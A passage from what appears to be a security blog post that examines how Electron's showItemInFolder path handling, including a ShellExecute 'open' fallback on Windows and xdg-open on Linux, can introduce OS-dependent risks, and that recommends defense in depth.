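    with open(file_path, "w") as handle:
        handle.write("payload")
    try:
        open_directory_atomically(file_path)  # a regular file: rejected by the kernel
        rejected = False
    except NotADirectoryError:
        rejected = True
    print(rejected)
```

Any later operation would then have to work on the returned file descriptor rather than on the path, which is exactly what a path-based launcher such as xdg-open cannot do.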

On Windows (/shell/common/platform_util_win.cc), the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {

...

base::win::ScopedCoMem<ITEMIDLIST> dir_item;

hr = desktop->ParseDisplayName(NULL, NULL,

const_cast<wchar_t*>(dir.value().c_str()),

NULL, &dir_item, NULL);

const ITEMIDLIST* highlight[] = {file_item};

hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,

NULL);

...

if (FAILED(hr)) {

if (hr == ERROR_FILE_NOT_FOUND) {

ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);

} else {

LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""

<< full_path.value() << "\""

<< " hr = " << logging::SystemErrorCodeToString(hr);

}

}

}

Under normal circumstances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fallback mechanism because the call mysteriously fails with a “file not found” error on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” object verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up for discussion, these examples showcase how innocuous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage dbus instead.

The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to secure the ElectronJS ecosystem and improve Electronegativity.